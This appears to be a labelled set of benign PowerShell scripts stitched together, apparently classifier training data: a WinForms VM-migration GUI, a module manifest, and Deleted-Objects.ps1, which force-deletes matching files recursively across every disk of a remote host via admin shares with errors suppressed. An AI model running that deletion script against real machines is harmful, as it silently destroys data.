$SourceDBListBox.Name = 'SourceDBListBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 180 $SourceDBListBox.Location = $System_Drawing_Point $SourceDBListBox.MultiColumn = $false $SourceDBListBox.HorizontalScrollBar = $true $SourceDBListBox.TabIndex = 5 $SourceDBListBox.Sorted = $True $SourceDBListBox.HorizontalScrollbar = $true # End Source Datastore List Box # Start Source VM List Box $SourceVMListBox.FormattingEnabled = $True $SourceVMListBox.CheckOnClick = $True $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 200 $System_Drawing_Size.Height = 415 $SourceVMListBox.Size = $System_Drawing_Size $SourceVMListBox.Font = new-object System.Drawing.Font("Tahoma",8) $SourceVMListBox.DataBindings.DefaultDataSourceUpdateMode = 0 $SourceVMListBox.Name = 'SourceVMListBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 180 $SourceVMListBox.Location = $System_Drawing_Point $SourceVMListBox.MultiColumn = $false $SourceVMListBox.TabIndex = 5 $SourceVMListBox.Sorted = $True $SourceVMListBox.HorizontalScrollbar = $True # End Source VM List Box # Start Source Button $SourceButton.TabIndex = 7 $SourceButton.Name = 'Source Button' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 200 $System_Drawing_Size.Height = 20 $SourceButton.Size = $System_Drawing_Size $SourceButton.Font = new-object System.Drawing.Font("Tahoma",8) $SourceButton.UseVisualStyleBackColor = $True $SourceButton.Text = 'Source' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 600 $SourceButton.Location = $System_Drawing_Point $SourceButton.DataBindings.DefaultDataSourceUpdateMode = 0 $SourceButton.add_Click($SourceButton_OnClick) $SourceButton.Enabled = $false $MigrationForm.Controls.Add($SourceButton) # End Source Button # Start All Clusters Checkbox $AllClustersCheckbox.TabIndex = 4 $AllClustersCheckbox.Name = 'AllClustersCheckbox' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 150 $System_Drawing_Size.Height = 20 $AllClustersCheckbox.Size = $System_Drawing_Size $AllClustersCheckbox.Font = new-object System.Drawing.Font("Tahoma",8) $AllClustersCheckbox.UseVisualStyleBackColor = $True $AllClustersCheckbox.Text = 'Show Hosts in All Clusters' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 250 $System_Drawing_Point.Y = 160 $AllClustersCheckbox.Location = $System_Drawing_Point $AllClustersCheckbox.DataBindings.DefaultDataSourceUpdateMode = 0 $AllClustersCheckbox.add_Click($AllClustersCheckbox_Click) $AllClustersCheckbox.Enabled = $False $MigrationForm.Controls.Add($AllClustersCheckbox) # End All Clusters Checkbox # Start Destination List Box $DestinationListBox.FormattingEnabled = $True $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 200 $System_Drawing_Size.Height = 415 $DestinationListBox.Size = $System_Drawing_Size $DestinationListBox.Font = new-object System.Drawing.Font("Tahoma",8) $DestinationListBox.DataBindings.DefaultDataSourceUpdateMode = 0 $DestinationListBox.Name = 'DestinationListBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 250 $System_Drawing_Point.Y = 180 $DestinationListBox.Location = $System_Drawing_Point $DestinationListBox.HorizontalScrollBar = $true $DestinationListBox.MultiColumn = $false $DestinationListBox.TabIndex = 5 $DestinationListBox.Sorted = $True $DestinationListBox.HorizontalScrollbar = $True $MigrationForm.Controls.Add($DestinationListBox) # End Destination List Box # Start Destination Button $DestinationButton.TabIndex = 7 $DestinationButton.Name = 'Destination Button' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 200 $System_Drawing_Size.Height = 20 $DestinationButton.Size = $System_Drawing_Size $DestinationButton.Font = new-object System.Drawing.Font("Tahoma",8) $DestinationButton.UseVisualStyleBackColor = $True $DestinationButton.Text = 'Destination' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 250 $System_Drawing_Point.Y = 600 $DestinationButton.Location = $System_Drawing_Point $DestinationButton.DataBindings.DefaultDataSourceUpdateMode = 0 $DestinationButton.add_Click($DestinationButton_OnClick) $DestinationButton.Enabled = $false $MigrationForm.Controls.Add($DestinationButton) # End Destination Button # Start FindVM Label $FindVMLabel.TabIndex = 2 $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 60 $System_Drawing_Size.Height = 20 $FindVMLabel.Size = $System_Drawing_Size $FindVMLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold) $FindVMLabel.Text = 'Find VM:' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 650 $FindVMLabel.Location = $System_Drawing_Point $FindVMLabel.DataBindings.DefaultDataSourceUpdateMode = 0 $FindVMLabel.Name = 'FindVMLabel' $MigrationForm.Controls.Add($FindVMLabel) # End FindVM Label # Start FindVM Textbox $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 140 $System_Drawing_Size.Height = 20 $FindVMTxtBox.Size = $System_Drawing_Size $FindVMTxtBox.Font = new-object System.Drawing.Font("Tahoma",8) $FindVMTxtBox.DataBindings.DefaultDataSourceUpdateMode = 0 $FindVMTxtBox.Name = 'FindVMTxtBox' $FindVMTxtBox.TabIndex = 6 $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 90 $System_Drawing_Point.Y = 650 $FindVMTxtBox.Location = $System_Drawing_Point $FindVMTxtBox.Enabled = $false $MigrationForm.Controls.Add($FindVMTxtBox) # End FindVM Textbox #Start FindVM Button $MigrationForm.DataBindings.DefaultDataSourceUpdateMode = 0 $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 250 $System_Drawing_Point.Y = 650 $FindVMBtn.Location = $System_Drawing_Point $FindVMBtn.Name = "FindVMBtn" $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Height = 20 $System_Drawing_Size.Width = 50 $FindVMBtn.Size = $System_Drawing_Size $FindVMBtn.TabIndex = 4 $FindVMBtn.Text = "Go" $FindVMBtn.Font = new-object System.Drawing.Font("Tahoma",8) $FindVMBtn.UseVisualStyleBackColor = $True $FindVMBtn.add_Click($FindVMBtn_OnClick) $FindVMBtn.Enabled = $false $MigrationForm.Controls.Add($FindVMBtn) #End FindVM Button #Start Reset FindVM Button $MigrationForm.DataBindings.DefaultDataSourceUpdateMode = 0 $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 305 $System_Drawing_Point.Y = 650 $ResetFindVMBtn.Location = $System_Drawing_Point $ResetFindVMBtn.Name = "ResetFindVMBtn" $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Height = 20 $System_Drawing_Size.Width = 50 $ResetFindVMBtn.Size = $System_Drawing_Size $ResetFindVMBtn.TabIndex = 5 $ResetFindVMBtn.Font = new-object System.Drawing.Font("Tahoma",8) $ResetFindVMBtn.Text = "Reset" $ResetFindVMBtn.UseVisualStyleBackColor = $True $ResetFindVMBtn.add_Click($ResetFindVMBtn_OnClick) $ResetFindVMBtn.Enabled = $false $MigrationForm.Controls.Add($ResetFindVMBtn) #End Reset FindVM Button # Start Migrate Button $MigrateButton.TabIndex = 7 $MigrateButton.Name = 'MigrateButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 130 $System_Drawing_Size.Height = 25 $MigrateButton.Size = $System_Drawing_Size $MigrateButton.Font = new-object System.Drawing.Font("Tahoma",8) $MigrateButton.UseVisualStyleBackColor = $True $MigrateButton.Text = 'Migrate' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 30 $System_Drawing_Point.Y = 720 $MigrateButton.Location = $System_Drawing_Point $MigrateButton.DataBindings.DefaultDataSourceUpdateMode = 0 $MigrateButton.add_Click($MigrateButton_OnClick) $MigrateButton.Enabled = $false $MigrationForm.Controls.Add($MigrateButton) # End Migrate Button # Start RESET Button $ResetButton.TabIndex = 19 $ResetButton.Name = 'ResetButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 140 $System_Drawing_Size.Height = 25 $ResetButton.Size = $System_Drawing_Size $ResetButton.Font = new-object System.Drawing.Font("Tahoma",8) $ResetButton.UseVisualStyleBackColor = $True $ResetButton.Text = 'Reset' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 170 $System_Drawing_Point.Y = 720 $ResetButton.Location = $System_Drawing_Point $ResetButton.DataBindings.DefaultDataSourceUpdateMode = 0 $ResetButton.add_Click($ResetButton_OnClick) $ResetButton.Enabled = $false $MigrationForm.Controls.Add($ResetButton) # End RESET Button # Start CLOSE Button $CloseButton.TabIndex = 19 $CloseButton.Name = 'CloseButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 130 $System_Drawing_Size.Height = 25 $CloseButton.Size = $System_Drawing_Size $CloseButton.Font = new-object System.Drawing.Font("Tahoma",8) $CloseButton.UseVisualStyleBackColor = $True $CloseButton.Text = 'Close' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 320 $System_Drawing_Point.Y = 720 $CloseButton.Location = $System_Drawing_Point $CloseButton.DataBindings.DefaultDataSourceUpdateMode = 0 $CloseButton.add_Click($CloseButton_OnClick) $MigrationForm.Controls.Add($CloseButton) # End CLOSE Button # Start Messages ListBox $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 80 $System_Drawing_Size.Height = 20 $MessagesLabel.Size = $System_Drawing_Size $MessagesLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold) $MessagesLabel.Text = 'Messages' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 480 $System_Drawing_Point.Y = 50 $MessagesLabel.Location = $System_Drawing_Point $MessagesLabel.DataBindings.DefaultDataSourceUpdateMode = 0 $MessagesLabel.Name = 'MessagesLabel' $MigrationForm.Controls.Add($MessagesLabel) $MessagesListBox.FormattingEnabled = $True $MessagesListBox.SelectionMode = "None" $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 525 $System_Drawing_Size.Height = 285 $MessagesListBox.Size = $System_Drawing_Size $MessagesListBox.Font = new-object System.Drawing.Font("Tahoma",8) $MessagesListBox.DataBindings.DefaultDataSourceUpdateMode = 0 $MessagesListBox.Name = 'MessagesListBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 480 $System_Drawing_Point.Y = 70 $MessagesListBox.Location = $System_Drawing_Point $MessagesListBox.MultiColumn = $false $MessagesListBox.HorizontalScrollbar = $true $MigrationForm.Controls.Add($MessagesListBox) # End Messages ListBox # Start Task ListBox $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 80 $System_Drawing_Size.Height = 20 $TaskLabel.Size = $System_Drawing_Size $TaskLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold) $TaskLabel.Text = 'Recent Tasks' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 480 $System_Drawing_Point.Y = 380 $TaskLabel.Location = $System_Drawing_Point $TaskLabel.DataBindings.DefaultDataSourceUpdateMode = 0 $TaskLabel.Name = 'TaskLabel' $MigrationForm.Controls.Add($TaskLabel) $TaskListBox.FormattingEnabled = $True $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 525 $System_Drawing_Size.Height = 285 $TaskListBox.Size = $System_Drawing_Size $TaskListBox.Font = new-object System.Drawing.Font("Tahoma",8) $TaskListBox.DataBindings.DefaultDataSourceUpdateMode = 0 $TaskListBox.Name = 'TaskListBox' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 480 $System_Drawing_Point.Y = 400 $TaskListBox.Location = $System_Drawing_Point $TaskListBox.MultiColumn = $false $TaskListBox.HorizontalScrollbar = $true $TaskListBox.SelectionMode = "MultiExtended" $MigrationForm.Controls.Add($TaskListBox) # End Task ListBox # Start Clear Messages Button $ClearMsgButton.TabIndex = 0 $ClearMsgButton.Name = 'ClearMsgButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 93 $System_Drawing_Size.Height = 25 $ClearMsgButton.Size = $System_Drawing_Size $ClearMsgButton.Font = new-object System.Drawing.Font("Tahoma",8) $ClearMsgButton.UseVisualStyleBackColor = $True $ClearMsgButton.Enabled = $false $ClearMsgButton.Text = 'Clear Messages' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 480 $System_Drawing_Point.Y = 720 $ClearMsgButton.Location = $System_Drawing_Point $ClearMsgButton.DataBindings.DefaultDataSourceUpdateMode = 0 $ClearMsgButton.add_Click($ClearMsgButton_Click) $MigrationForm.Controls.Add($ClearMsgButton) # End Clear Messages Button # Start Undo Button $UndoButton.TabIndex = 0 $UndoButton.Name = 'UndoButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 93 $System_Drawing_Size.Height = 25 $UndoButton.Size = $System_Drawing_Size $UndoButton.Font = new-object System.Drawing.Font("Tahoma",8) $UndoButton.UseVisualStyleBackColor = $True $UndoButton.Enabled = $false $UndoButton.Text = 'Undo' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 588 $System_Drawing_Point.Y = 720 $UndoButton.Location = $System_Drawing_Point $UndoButton.DataBindings.DefaultDataSourceUpdateMode = 0 $UndoButton.add_Click($UndoButton_Click) $MigrationForm.Controls.Add($UndoButton) # End Undo Button # Start UndoALL Button $UndoALLButton.TabIndex = 0 $UndoALLButton.Name = 'UndoALLButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 93 $System_Drawing_Size.Height = 25 $UndoALLButton.Size = $System_Drawing_Size $UndoALLButton.Font = new-object System.Drawing.Font("Tahoma",8) $UndoALLButton.UseVisualStyleBackColor = $True $UndoALLButton.Enabled = $false $UndoALLButton.Text = 'Undo ALL' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 696 $System_Drawing_Point.Y = 720 $UndoALLButton.Location = $System_Drawing_Point $UndoALLButton.DataBindings.DefaultDataSourceUpdateMode = 0 $UndoALLButton.add_Click($UndoALLButton_Click) $MigrationForm.Controls.Add($UndoALLButton) # End UndoALL Button # Start Save Task Button $SaveTaskButton.TabIndex = 0 $SaveTaskButton.Name = 'SaveTaskButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 93 $System_Drawing_Size.Height = 25 $SaveTaskButton.Size = $System_Drawing_Size $SaveTaskButton.Font = new-object System.Drawing.Font("Tahoma",8) $SaveTaskButton.UseVisualStyleBackColor = $True $SaveTaskButton.Enabled = $false $SaveTaskButton.Text = 'Save Tasks' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 804 $System_Drawing_Point.Y = 720 $SaveTaskButton.Location = $System_Drawing_Point $SaveTaskButton.DataBindings.DefaultDataSourceUpdateMode = 0 $SaveTaskButton.add_Click($SaveTaskButton_Click) $MigrationForm.Controls.Add($SaveTaskButton) # End Save Task Button # Start Load Task Button $ReloadTaskButton.TabIndex = 0 $ReloadTaskButton.Name = 'ReloadTaskButton' $System_Drawing_Size = New-Object System.Drawing.Size $System_Drawing_Size.Width = 93 $System_Drawing_Size.Height = 25 $ReloadTaskButton.Size = $System_Drawing_Size $ReloadTaskButton.Font = new-object System.Drawing.Font("Tahoma",8) $ReloadTaskButton.UseVisualStyleBackColor = $True $ReloadTaskButton.Enabled = $false $ReloadTaskButton.Text = 'Reload Tasks' $System_Drawing_Point = New-Object System.Drawing.Point $System_Drawing_Point.X = 912 $System_Drawing_Point.Y = 720 $ReloadTaskButton.Location = $System_Drawing_Point $ReloadTaskButton.DataBindings.DefaultDataSourceUpdateMode = 0 $ReloadTaskButton.add_Click($ReloadTaskButton_Click) $MigrationForm.Controls.Add($ReloadTaskButton) # End Load Task Button #endregion Generated Form Code #Save the initial state of the form $InitialFormWindowState = $MigrationForm.WindowState #Init the OnLoad event to correct the initial state of the form $MigrationForm.add_Load($OnLoadForm_StateCorrection) #Show the Form $MigrationForm.ShowDialog()| Out-Null } #End Function #Call the Function GenerateForm
combined_dataset/train/non-malicious/Deleted-Objects.ps1
Deleted-Objects.ps1
param ( $Computer, [String[]]$ObjectsDeleted ) $Info = $null $Disks = $null trap {Write-Host "Error WmiObject $Computer";Continue} $Disks += Get-WmiObject win32_logicaldisk -ComputerName $Computer | Where-Object {$_.Size -ne $null} foreach ($Disk in $Disks){ if ($Disk.Name -like "*:*") { $Disk = $Disk.Name.Replace(":","$") } trap {Write-Host "Error ChildItem $Computer";Continue} $Info += Get-ChildItem "\\\\$Computer\\$Disk\\*" -Recurse -ErrorAction SilentlyContinue if ($Info){ foreach ($Object in $ObjectsDeleted){ $Info | Where-Object {$_.Name -like $Object} | % {remove-item $_.fullname -Recurse -Force -ErrorAction SilentlyContinue} } } }
combined_dataset/train/non-malicious/sample_59_93.ps1
sample_59_93.ps1
# # Module manifest for module 'OCI.PSModules.Loganalytics' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Loganalytics.dll' # Version number of this module. ModuleVersion = '85.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'a190d2eb-8d34-45b0-836a-ba4f1b2e1914' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Loganalytics Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '85.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Loganalytics.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Add-OCILoganalyticsEntityAssociation', 'Add-OCILoganalyticsSourceEventTypes', 'Confirm-OCILoganalyticsAssociationParameters', 'Confirm-OCILoganalyticsEndpoint', 'Confirm-OCILoganalyticsFile', 'Confirm-OCILoganalyticsLabelCondition', 'Confirm-OCILoganalyticsSource', 'Confirm-OCILoganalyticsSourceExtendedFieldDetails', 'Confirm-OCILoganalyticsSourceMapping', 'Disable-OCILoganalyticsArchiving', 'Disable-OCILoganalyticsAutoAssociation', 'Disable-OCILoganalyticsIngestTimeRule', 'Disable-OCILoganalyticsSourceEventTypes', 'Enable-OCILoganalyticsArchiving', 'Enable-OCILoganalyticsAutoAssociation', 'Enable-OCILoganalyticsIngestTimeRule', 'Enable-OCILoganalyticsSourceEventTypes', 'Export-OCILoganalyticsCustomContent', 'Export-OCILoganalyticsQueryResult', 'Get-OCILoganalyticsAssociableEntitiesList', 'Get-OCILoganalyticsAssociatedEntitiesList', 'Get-OCILoganalyticsAssociationSummary', 'Get-OCILoganalyticsAutoAssociationsList', 'Get-OCILoganalyticsCategoriesList', 'Get-OCILoganalyticsCategory', 'Get-OCILoganalyticsColumnNames', 'Get-OCILoganalyticsConfigWorkRequest', 'Get-OCILoganalyticsConfigWorkRequestsList', 'Get-OCILoganalyticsEffectivePropertiesList', 'Get-OCILoganalyticsEmBridge', 'Get-OCILoganalyticsEmBridgesList', 'Get-OCILoganalyticsEmBridgeSummary', 'Get-OCILoganalyticsEncryptionKeyInfoList', 'Get-OCILoganalyticsEntitiesList', 'Get-OCILoganalyticsEntitiesSummary', 'Get-OCILoganalyticsEntity', 'Get-OCILoganalyticsEntityAssociationsList', 'Get-OCILoganalyticsEntitySourceAssociationsList', 'Get-OCILoganalyticsEntityTopologyList', 'Get-OCILoganalyticsEntityType', 'Get-OCILoganalyticsEntityTypesList', 'Get-OCILoganalyticsField', 'Get-OCILoganalyticsFieldsList', 'Get-OCILoganalyticsFieldsSummary', 'Get-OCILoganalyticsIngestTimeRule', 'Get-OCILoganalyticsIngestTimeRulesList', 'Get-OCILoganalyticsLabel', 'Get-OCILoganalyticsLabelPrioritiesList', 'Get-OCILoganalyticsLabelsList', 'Get-OCILoganalyticsLabelSourceDetailsList', 'Get-OCILoganalyticsLabelSummary', 'Get-OCILoganalyticsLogGroup', 'Get-OCILoganalyticsLogGroupsList', 'Get-OCILoganalyticsLogGroupsSummary', 'Get-OCILoganalyticsLogSetsCount', 'Get-OCILoganalyticsLogSetsList', 'Get-OCILoganalyticsLookup', 'Get-OCILoganalyticsLookupsList', 'Get-OCILoganalyticsLookupSummary', 'Get-OCILoganalyticsMetaSourceTypesList', 'Get-OCILoganalyticsNamespace', 'Get-OCILoganalyticsNamespacesList', 'Get-OCILoganalyticsObjectCollectionRule', 'Get-OCILoganalyticsObjectCollectionRulesList', 'Get-OCILoganalyticsOverlappingRecallsList', 'Get-OCILoganalyticsParser', 'Get-OCILoganalyticsParserFunctionsList', 'Get-OCILoganalyticsParserMetaPluginsList', 'Get-OCILoganalyticsParsersList', 'Get-OCILoganalyticsParserSummary', 'Get-OCILoganalyticsPreferences', 'Get-OCILoganalyticsPropertiesMetadataList', 'Get-OCILoganalyticsQueryResult', 'Get-OCILoganalyticsQueryWorkRequest', 'Get-OCILoganalyticsQueryWorkRequestsList', 'Get-OCILoganalyticsRecallCount', 'Get-OCILoganalyticsRecalledDataList', 'Get-OCILoganalyticsRecalledDataSize', 'Get-OCILoganalyticsResourceCategoriesList', 'Get-OCILoganalyticsRulesList', 'Get-OCILoganalyticsRulesSummary', 'Get-OCILoganalyticsScheduledTask', 'Get-OCILoganalyticsScheduledTasksList', 'Get-OCILoganalyticsSource', 'Get-OCILoganalyticsSourceAssociationsList', 'Get-OCILoganalyticsSourceEventTypesList', 'Get-OCILoganalyticsSourceExtendedFieldDefinitionsList', 'Get-OCILoganalyticsSourceLabelOperatorsList', 'Get-OCILoganalyticsSourceMetaFunctionsList', 'Get-OCILoganalyticsSourcePatternsList', 'Get-OCILoganalyticsSourcesList', 'Get-OCILoganalyticsSourceSummary', 'Get-OCILoganalyticsStorage', 'Get-OCILoganalyticsStorageUsage', 'Get-OCILoganalyticsStorageWorkRequest', 'Get-OCILoganalyticsStorageWorkRequestErrorsList', 'Get-OCILoganalyticsStorageWorkRequestsList', 'Get-OCILoganalyticsSupportedCharEncodingsList', 'Get-OCILoganalyticsSupportedTimezonesList', 'Get-OCILoganalyticsUnprocessedDataBucket', 'Get-OCILoganalyticsUpload', 'Get-OCILoganalyticsUploadFilesList', 'Get-OCILoganalyticsUploadsList', 'Get-OCILoganalyticsUploadWarningsList', 'Get-OCILoganalyticsWarningsList', 'Get-OCILoganalyticsWorkRequest', 'Get-OCILoganalyticsWorkRequestErrorsList', 'Get-OCILoganalyticsWorkRequestLogsList', 'Get-OCILoganalyticsWorkRequestsList', 'Import-OCILoganalyticsCustomContent', 'Invoke-OCILoganalyticsAppendLookupData', 'Invoke-OCILoganalyticsAssignEncryptionKey', 'Invoke-OCILoganalyticsBatchGetBasicInfo', 'Invoke-OCILoganalyticsClean', 'Invoke-OCILoganalyticsCompareContent', 'Invoke-OCILoganalyticsEstimatePurgeDataSize', 'Invoke-OCILoganalyticsEstimateRecallDataSize', 'Invoke-OCILoganalyticsEstimateReleaseDataSize', 'Invoke-OCILoganalyticsExtractStructuredLogFieldPaths', 'Invoke-OCILoganalyticsExtractStructuredLogHeaderPaths', 'Invoke-OCILoganalyticsFilter', 'Invoke-OCILoganalyticsOffboardNamespace', 'Invoke-OCILoganalyticsOnboardNamespace', 'Invoke-OCILoganalyticsParseQuery', 'Invoke-OCILoganalyticsPauseScheduledTask', 'Invoke-OCILoganalyticsPurgeStorageData', 'Invoke-OCILoganalyticsQuery', 'Invoke-OCILoganalyticsRecallArchivedData', 'Invoke-OCILoganalyticsReleaseRecalledData', 'Invoke-OCILoganalyticsResumeScheduledTask', 'Invoke-OCILoganalyticsRun', 'Invoke-OCILoganalyticsSetUnprocessedDataBucket', 'Invoke-OCILoganalyticsSuggest', 'Invoke-OCILoganalyticsSuppressWarning', 'Invoke-OCILoganalyticsTestParser', 'Invoke-OCILoganalyticsUnsuppressWarning', 'Invoke-OCILoganalyticsUpsertAssociations', 'Invoke-OCILoganalyticsUpsertField', 'Invoke-OCILoganalyticsUpsertLabel', 'Invoke-OCILoganalyticsUpsertParser', 'Invoke-OCILoganalyticsUpsertSource', 'Invoke-OCILoganalyticsVerify', 'Move-OCILoganalyticsEmBridgeCompartment', 'Move-OCILoganalyticsEntityCompartment', 'Move-OCILoganalyticsIngestTimeRuleCompartment', 'Move-OCILoganalyticsLogGroupCompartment', 'Move-OCILoganalyticsObjectCollectionRuleCompartment', 'Move-OCILoganalyticsScheduledTaskCompartment', 'New-OCILoganalyticsEmBridge', 'New-OCILoganalyticsEntity', 'New-OCILoganalyticsEntityType', 'New-OCILoganalyticsIngestTimeRule', 'New-OCILoganalyticsLogGroup', 'New-OCILoganalyticsObjectCollectionRule', 'New-OCILoganalyticsScheduledTask', 'Register-OCILoganalyticsLookup', 'Remove-OCILoganalyticsAssociations', 'Remove-OCILoganalyticsEmBridge', 'Remove-OCILoganalyticsEntity', 'Remove-OCILoganalyticsEntityAssociations', 'Remove-OCILoganalyticsEntityType', 'Remove-OCILoganalyticsField', 'Remove-OCILoganalyticsIngestTimeRule', 'Remove-OCILoganalyticsLabel', 'Remove-OCILoganalyticsLogGroup', 'Remove-OCILoganalyticsLookup', 'Remove-OCILoganalyticsObjectCollectionRule', 'Remove-OCILoganalyticsParser', 'Remove-OCILoganalyticsPreferences', 'Remove-OCILoganalyticsResourceCategories', 'Remove-OCILoganalyticsScheduledTask', 'Remove-OCILoganalyticsSource', 'Remove-OCILoganalyticsSourceEventTypes', 'Remove-OCILoganalyticsUpload', 'Remove-OCILoganalyticsUploadFile', 'Remove-OCILoganalyticsUploadWarning', 'Stop-OCILoganalyticsQueryWorkRequest', 'Update-OCILoganalyticsEmBridge', 'Update-OCILoganalyticsEntity', 'Update-OCILoganalyticsEntityType', 'Update-OCILoganalyticsIngestTimeRule', 'Update-OCILoganalyticsLogGroup', 'Update-OCILoganalyticsLookup', 'Update-OCILoganalyticsLookupData', 'Update-OCILoganalyticsObjectCollectionRule', 'Update-OCILoganalyticsPreferences', 'Update-OCILoganalyticsResourceCategories', 'Update-OCILoganalyticsScheduledTask', 'Update-OCILoganalyticsStorage', 'Write-OCILoganalyticsDiscoveryData', 'Write-OCILoganalyticsLogEventsFile', 'Write-OCILoganalyticsLogFile', 'Write-OCILoganalyticsQueryWorkRequestBackground' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Loganalytics' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_10_4.ps1
sample_10_4.ps1
